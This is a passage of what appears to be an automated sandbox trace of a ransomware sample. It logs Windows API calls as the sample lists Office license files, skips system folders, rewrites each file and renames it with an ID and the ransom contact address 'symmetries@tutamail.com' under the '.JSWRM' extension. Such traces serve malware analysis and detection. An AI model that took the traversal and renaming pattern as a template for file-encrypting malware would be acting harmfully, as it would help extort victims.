(HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0109.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0109.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0109.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0109.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0109.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0109.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0109.768] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_mak-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_MAK-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_mak-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0109.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0109.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0109.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0109.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0109.769] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb1b559b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb1b559b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb27410b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4de5, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PublisherVL_MAK-ul-phn.xrm-ms", cAlternateFileName="PUA643~1.XRM")) returned 1 [0109.769] lstrcmpiW (lpString1="PublisherVL_MAK-ul-phn.xrm-ms", lpString2=".") returned 1 [0109.769] lstrcmpiW (lpString1="PublisherVL_MAK-ul-phn.xrm-ms", lpString2="..") returned 1 [0109.769] lstrcmpiW (lpString1="PublisherVL_MAK-ul-phn.xrm-ms", lpString2="...") returned 1 [0109.769] lstrcmpiW (lpString1="PublisherVL_MAK-ul-phn.xrm-ms", lpString2="windows") returned -1 [0109.769] lstrcmpiW (lpString1="PublisherVL_MAK-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0109.769] lstrcmpiW (lpString1="PublisherVL_MAK-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0109.769] lstrcmpiW (lpString1="PublisherVL_MAK-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0109.769] lstrcmpiW (lpString1="PublisherVL_MAK-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.769] lstrcmpiW (lpString1="PublisherVL_MAK-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0109.769] lstrcmpiW (lpString1="PublisherVL_MAK-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0109.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0109.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_MAK-ul-phn.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0109.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0109.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_MAK-ul-phn.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241268, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0109.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0109.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0109.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_MAK-ul-phn.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0109.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0109.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_MAK-ul-phn.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241038, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0109.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0109.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0109.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0109.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0109.770] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_mak-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.770] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19941) returned 1 [0109.770] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0109.770] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0109.773] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.773] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0109.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.773] CloseHandle (hObject=0x45c) returned 1 [0109.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0109.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0109.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0109.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0109.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0109.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0109.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.774] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_mak-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_MAK-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_mak-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0109.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0109.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0109.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0109.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0109.775] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb18f2e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb18f2e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb227c5a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x29db, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SkypeforBusinessEntryR_PrepidBypass-pl.xrm-ms", cAlternateFileName="SKD43B~1.XRM")) returned 1 [0109.775] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-pl.xrm-ms", lpString2=".") returned 1 [0109.775] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-pl.xrm-ms", lpString2="..") returned 1 [0109.775] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-pl.xrm-ms", lpString2="...") returned 1 [0109.775] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-pl.xrm-ms", lpString2="windows") returned -1 [0109.775] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-pl.xrm-ms", lpString2="recovery") returned 1 [0109.775] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-pl.xrm-ms", lpString2="perflogs") returned 1 [0109.775] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-pl.xrm-ms", lpString2="documents and settings") returned 1 [0109.775] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.775] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-pl.xrm-ms", lpString2="system volume information") returned -1 [0109.775] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-pl.xrm-ms", lpString2="msocache") returned 1 [0109.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0109.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessEntryR_PrepidBypass-pl.xrm-ms", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0109.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessEntryR_PrepidBypass-pl.xrm-ms", cchWideChar=45, lpMultiByteStr=0x22d0a0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessEntryR_PrepidBypass-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 45 [0109.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0109.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0109.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessEntryR_PrepidBypass-pl.xrm-ms", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0109.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessEntryR_PrepidBypass-pl.xrm-ms", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessEntryR_PrepidBypass-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 45 [0109.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0109.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0109.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0109.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0109.775] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessEntryR_PrepidBypass-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessentryr_prepidbypass-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.776] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10715) returned 1 [0109.776] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x29d0) returned 0x24c1d0 [0109.776] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x29d0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x29d0, lpOverlapped=0x0) returned 1 [0109.778] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.778] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x29d0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x29d0, lpOverlapped=0x0) returned 1 [0109.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.778] CloseHandle (hObject=0x45c) returned 1 [0109.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0109.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0109.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0109.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0109.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0109.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ee50 [0109.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0109.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ee50 | out: hHeap=0x1e0000) returned 1 [0109.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.779] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessEntryR_PrepidBypass-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessentryr_prepidbypass-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessEntryR_PrepidBypass-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessentryr_prepidbypass-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0109.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0109.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0109.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.780] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb142e44, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb142e44, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb201a07, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1748, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SkypeforBusinessEntryR_PrepidBypass-ppd.xrm-ms", cAlternateFileName="SK804C~1.XRM")) returned 1 [0109.780] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-ppd.xrm-ms", lpString2=".") returned 1 [0109.780] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-ppd.xrm-ms", lpString2="..") returned 1 [0109.780] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-ppd.xrm-ms", lpString2="...") returned 1 [0109.780] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-ppd.xrm-ms", lpString2="windows") returned -1 [0109.780] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-ppd.xrm-ms", lpString2="recovery") returned 1 [0109.780] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-ppd.xrm-ms", lpString2="perflogs") returned 1 [0109.780] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0109.780] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.780] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-ppd.xrm-ms", lpString2="system volume information") returned -1 [0109.780] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-ppd.xrm-ms", lpString2="msocache") returned 1 [0109.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0109.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessEntryR_PrepidBypass-ppd.xrm-ms", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0109.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessEntryR_PrepidBypass-ppd.xrm-ms", cchWideChar=46, lpMultiByteStr=0x22d0a0, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessEntryR_PrepidBypass-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 46 [0109.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0109.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0109.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessEntryR_PrepidBypass-ppd.xrm-ms", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0109.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessEntryR_PrepidBypass-ppd.xrm-ms", cchWideChar=46, lpMultiByteStr=0x22cdc8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessEntryR_PrepidBypass-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 46 [0109.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0109.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0109.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0109.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f1b0 [0109.781] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessEntryR_PrepidBypass-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessentryr_prepidbypass-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.781] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: 